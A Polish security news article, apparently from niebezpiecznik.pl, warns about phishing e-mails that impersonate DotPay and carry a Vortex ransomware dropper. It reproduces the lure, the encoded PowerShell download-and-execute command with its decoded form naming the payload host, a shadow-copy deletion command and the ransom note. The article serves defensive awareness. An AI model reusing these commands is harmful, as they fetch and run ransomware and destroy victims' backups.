Uwaga na e-maile podszywające się pod DotPay — otworzenie załącznika może Cię kosztować 350 PLN

Od rana informujecie nas o e-maila podszywających się pod firmę DotPay jakie dostajecie na swoje prywatne i firmowe skrzynki. Do wiadomości załączony jest plik, którego otworzenie może zakończyć się infekcją komputera złośliwym oprogramowaniem. Przyjrzymy się wiadomości:

Received: from abl224.rev.netart.pl (77.55.37.224)

From: noreply@dotpay.pl [mailto:noreply@dotpay.pl]
Sent: Tuesday, November 21, 2017 3:40 AM
Subject: Płatność w systemie Dotpay M6694-5134

Numer transakcji:
M6694-5134

Kwota:
62,37 PLN

Status:
wykonana

Drogi Użytkowniku! (Adresatem tej wiadomości jest [$EMAIL_ODBIORCY]).

Odnotowaliśmy próbę płatności w kwocie 62,37 PLN

Opis zamówienia:
Wplata online
Data i czas:
21 listopada 2017 23:42:59

Jeżeli wpłata została dokonana przelewem, odbiorcą przelewu na wyciągu będzie Dotpay SA Wielicka 72, 30-552 Kraków.

Informacja o wykonaniu płatności została przekazana do sprzedawcy, a należne mu środki udostępnione w Serwisie Dotpay.

Ewentualne pytania dotyczące realizacji zamówienia prosimy kierować do sprzedawcy.

Ta wiadomość została wygenerowana automatycznie. Prosimy na nią nie odpowiadać.

Z nadesłanych do nas próbek wynika, że rozsyłanych jest kilka wariantów e-maili (zmienia się numer transakcji i kwota). Oto te, zaobserwowane w przesłanych od Was e-mailach:


M6694-5134 63,37
M7822-5134 302,17
M7295-1680 620,47

Co ciekawe, w pierwszym z ww. wariantów, e-mail wspomina o transakcji z przyszłości (21 listopada) — w kolejnych wariantach atakujący wrócił z podróży w czasie do teraźniejszości 😉

Sama treść e-maila nie jest groźna. Na czym więc polega atak? Na uruchomieniu dołączonego do e-maila załącznika — do którego jednak w ogóle nie odnosi się treść wiadomości. Ciekawe jak bardzo negatywnie wpłynie to na wyniki kampanii — Armaged0n, dasz nam znać na maila? 🙂

Złośliwy załącznik

Do e-maila załączony jest plik:

Platnosc_w_systemie_Dotpay_M6694-5134_PDF.z

będący archiwum zawierającym następujący katalog i plik:

Płatnosc_w_systemie_Dotpay_M6694-5134_PDF.js

o następującej zawartości:

Kliknięcie na ten plik w systemie Windows spowoduje uruchomienie polecenia w PowerShellu, które podbierze i uruchomi złośliwe oprogramowanie szyfrujące dysk.


powershell.exe powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -EncodedCommand
UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQB
jAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQ
AbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKAB
OAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEM
AbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA
6AC8ALwB0AGUAbgBvAHIALgBjAG8AbQAuAHAAbAAvAHAAbABpAGsAaQAvAGIAaQBuAHM
AdAB4AHQALgBlAHgAZQAnACwAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAGIAaQB
uAHMALgBlAHgAZQAdICkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAdICQ
AZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAYgBpAG4AcwAuAGUAeABlAB0gKQA=

czyli:


PowerShell -command ( System.Net.WebClient).DownloadFile('http://tenor.com.pl/
pliki/binstxt.exe','C:\Users\xxx\AppData\Roaming'\bins.exe);
Start-Process ('C:\Users\xxx\AppData\Roaming'\bins.exe);)

Skrypt uruchamia plik binstxt.exe (ransomware) z serwera tenor.com.pl (85.128.135.36) oraz kasuje kopie plików, które zaraz zostaną zaszyfrowane:

cmd.exe vssadmin.exe Delete Shadows /All /Quiet

Złośliwe oprogramowanie melduje się także do serwera

plaamkaa.eu 104.28.0.113

…i po zakończeniu szyfrowania pokazuje ofierze następujący komunikat:

V_o_r_t_e_x R_a_n_s_o_m_w_a_r_e

!!!! U W A G A !!!! Masz Problem Ze Znalezieniem Potrzebnych Danych ? Nie Moesz Otworzy Swoich Dokumentw? Po Otworzeniu Wanych Plikw Widzisz Tylko Nic Nie Mwicy, Dziwny Cig Znakw? Twoje Istotne Pliki Zostay Zaszyfrowane ! Twoje Zdjcia, Dokumenty, Bazy Danych, Zostay Zaszyfrowane Niemozliwym Do Zlamania Algorytmem Aes-256 Metody Tej Do Szyfrowania Zawartosci Dokumentw Uzywaja Sluzby Wywiadowcze I Wojsko.

Gdy To Czytasz Proces Jest Zakoczony, Wytypowane Pliki Zostay Zaszyfrowane A Sam Program Usunity Z Twojego Komputera. Odzyskac Twoje Dane Mozna Tylko Przy Pomocy Dedykowanego Programu Deszyfrujcego, Wraz Z Jednorazowym Kluczem Wygenerowanym Unikalnie Dla Ciebie! Dwa Pliki Odszyfrujemy Bez Opaty Aby Nie By Goosownymi, Za Pozostae Bdziecie Pastwo Musieli Zapaci 100$ Aby Odzyska Pliki Skontaktuj Si Z Nami Pod Adresem: Hc9@2.pl Lub Hc9@goat.si Radzimy Decydowa Si Szybko, 4 Dni Od Zaszyfrowania Opata Zostanie Podniesiona Do 200$.

Kontaktujac Sie Z Nami Pamietaj Aby Podac Id-komputera I Date DANE: IP=X ID=X Data=21-11-2017 00:33:09

źródło: niebezpiecznik.pl

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *